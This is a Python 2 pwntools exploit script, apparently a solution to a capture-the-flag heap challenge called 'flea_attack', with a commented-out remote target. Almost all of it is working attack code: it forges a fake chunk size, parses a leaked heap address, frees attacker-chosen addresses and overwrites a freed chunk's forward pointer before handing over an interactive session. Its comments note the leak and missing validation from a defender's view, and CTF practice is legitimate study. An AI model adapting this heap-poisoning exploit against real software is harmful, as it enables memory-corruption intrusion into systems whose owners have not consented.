#!/usr/bin/python
# Python 2 script (print statements, raw_input): a pwntools driver that talks
# to the challenge binary through its text menu. Every step below is
# order-dependent I/O with the child process, so read it top to bottom.
import pwn
from pwn import *
# Local process by default; the remote target line is kept but commented out.
p = pwn.process("./flea_attack.elf")
# p = pwn.remote("problem.harekaze.com",20175)
# Pause so a debugger can be attached to the child before any input is sent.
raw_input("<ATTACH NOW>")
p.recv()
# the size is 0x04.
p.sendline("") # no-one cares
# Menu option "1" appears to be an allocation and "50" the requested size;
# this is inferred from the prompts, not visible here -- confirm against the binary.
p.recvuntil(">")
p.sendline("1")
p.recv()
p.sendline("50")
# Payload: 8 filler bytes followed by three little-endian qwords. 0x21 is the
# value the script expects to land on a chunk size field; the heap-layout
# assumption behind that is not visible from this file.
buf = "blahblah"
buf += p64(0)
buf += p64(0)
buf += p64(0x21)
p.sendline(buf)
# The program prints the chunk address after "Addr: "; the script parses it
# as hex. From a defender's view this echoed heap pointer is the information
# leak every later step depends on -- a service that does not print raw
# addresses removes that foothold.
p.recvuntil("Addr: ")
basechunk = int(p.recvuntil("\n").rstrip(),16)
print " ADDRESS OF CHUNK AT: %x" % basechunk
raw_input("<STOP>")
# Menu option "2" appears to free an address supplied by the user in hex
# (again inferred from the prompts). basechunk + 0x20 is freed first, then
# basechunk itself. If the binary frees whatever address it is given, that
# missing validation is the bug the script relies on.
p.recvuntil(">")
p.sendline("2")
p.recv()
print " FREEING CHUNK at %x" % (basechunk + 0x20)
p.sendline("%x" % (basechunk + 0x20))
p.recvuntil(">")
p.sendline("2")
p.recv()
p.sendline("%x" % basechunk)
p.recvuntil(">")
print "ALLOCATING FIRST CHUNK WITH OVERWRITE"
# Second allocation: the same header bytes as before plus one extra qword.
p.sendline("1")
p.sendline("50")
buf = "blahblah"
buf += p64(0)
buf += p64(0)
buf += p64(0x21)
# buf += p64()
buf += p64(0x203ff8) # FWD PTR. Must be a valid chunk header.
p.sendline(buf)
# Hand the session to the user; the script itself checks nothing about
# whether any of the above had the intended effect.
p.interactive()